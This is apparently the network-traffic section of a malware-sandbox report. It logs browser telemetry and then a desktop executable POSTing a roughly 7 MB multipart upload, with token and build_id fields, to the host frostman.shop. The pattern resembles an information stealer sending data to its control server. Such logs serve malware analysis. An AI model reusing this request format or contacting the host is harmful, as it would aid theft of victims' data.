                                                                                                                                                                                                                                                                              2024-12-20 06:31:51 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:51 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:51 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:51 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:51 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:51 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:53 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:52 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              2024-12-20 06:31:53 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              31192.168.2.74989920.42.65.904431552C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:51 UTC1082OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734680546564&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                              Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              Content-Length: 3810
                                                                                                                                                                                                                                                                              sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                              Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                              Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                              Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                              Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                              Cookie: _C_ETH=1; USRLOC=; MUID=2FB26BEE4D14683625707EB54C6669DF; _EDGE_S=F=1&SID=145EA6F856B060B31CAAB3A3577061E4; _EDGE_V=1
                                                                                                                                                                                                                                                                              2024-12-20 06:31:51 UTC3810OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 30 54 30 37 3a 34 32 3a 32 36 2e 35 35 39 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 63 33 65 65 30 37 66 33 2d 36 36 65 61 2d 34 36 31 37 2d 61 38 35 64 2d 66 30 30 63 32 30 38 37 61 37 31 64 22 2c 22 65 70 6f 63 68 22 3a 22 31 33 30 39 31 34 36 38 38 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                              Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-12-20T07:42:26.559Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"c3ee07f3-66ea-4617-a85d-f00c2087a71d","epoch":"1309146888"},"app":{"locale
                                                                                                                                                                                                                                                                              2024-12-20 06:31:53 UTC894INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                              P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                              Set-Cookie: MC1=GUID=66ee8fe110d74100a7764a8f021547e5&HASH=66ee&LV=202412&V=4&LU=1734676313015; Domain=.microsoft.com; Expires=Sat, 20 Dec 2025 06:31:53 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                              Set-Cookie: MS0=ecad6973803e4563b5f0fe2bb108ad9f; Domain=.microsoft.com; Expires=Fri, 20 Dec 2024 07:01:53 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                              time-delta-millis: -4233549
                                                                                                                                                                                                                                                                              Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                              Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:52 GMT
                                                                                                                                                                                                                                                                              Connection: close


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              32192.168.2.74991018.173.219.1134431552C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:52 UTC1012OUTGET /b2?rn=1734680546567&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2FB26BEE4D14683625707EB54C6669DF&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                              Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                              Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                              Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                              Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                              Cookie: UID=139bc9b74b908404e24257b1734676310; XID=139bc9b74b908404e24257b1734676310
                                                                                                                                                                                                                                                                              2024-12-20 06:31:52 UTC326INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:52 GMT
                                                                                                                                                                                                                                                                              Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                              X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                              Via: 1.1 f7b469bae3f4a6418a1a6a50a32d318c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                              X-Amz-Cf-Pop: JFK52-P1
                                                                                                                                                                                                                                                                              X-Amz-Cf-Id: SpYmMKbEDEo6bIsMa0l7iMNjoHUgmetVjvYZvWN15-xlLy2OY3gbpg==


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              33192.168.2.74991220.110.205.1194431552C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:52 UTC1261OUTGET /c.gif?rnd=1734680546567&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=796ea4f60b9c41758e1e1163076781a5&activityId=796ea4f60b9c41758e1e1163076781a5&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=DFA719B7D8764A69A65627E5921512AA&MUID=2FB26BEE4D14683625707EB54C6669DF HTTP/1.1
                                                                                                                                                                                                                                                                              Host: c.msn.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                              Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                              Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                              Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                              Cookie: USRLOC=; MUID=2FB26BEE4D14683625707EB54C6669DF; _EDGE_S=F=1&SID=145EA6F856B060B31CAAB3A3577061E4; _EDGE_V=1; SM=T
                                                                                                                                                                                                                                                                              2024-12-20 06:31:53 UTC982INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                                                                                                                                              Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                              ETag: "9270eb7934bdb1:0"
                                                                                                                                                                                                                                                                              Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                              P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                              Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                              Set-Cookie: MUID=2FB26BEE4D14683625707EB54C6669DF; domain=.msn.com; expires=Wed, 14-Jan-2026 06:31:53 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                              Set-Cookie: SRM_M=2FB26BEE4D14683625707EB54C6669DF; domain=c.msn.com; expires=Wed, 14-Jan-2026 06:31:53 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                              Set-Cookie: MR=0; domain=c.msn.com; expires=Fri, 27-Dec-2024 06:31:53 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                              Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Fri, 20-Dec-2024 06:41:53 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:52 GMT
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              Content-Length: 42
                                                                                                                                                                                                                                                                              2024-12-20 06:31:53 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                              Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              34192.168.2.749918116.203.12.1144436960C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:53 UTC329OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----7G4WBI5PPH4E3EUS00HD
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Content-Length: 6990993
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:31:53 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 37 47 34 57 42 49 35 50 50 48 34 45 33 45 55 53 30 30 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 37 47 34 57 42 49 35 50 50 48 34 45 33 45 55 53 30 30 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 37 47 34 57 42 49 35 50 50 48 34 45 33 45 55 53 30 30 48 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: ------7G4WBI5PPH4E3EUS00HDContent-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------7G4WBI5PPH4E3EUS00HDContent-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------7G4WBI5PPH4E3EUS00HDCont
                                                                                                                                                                                                                                                                              2024-12-20 06:31:53 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:53 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
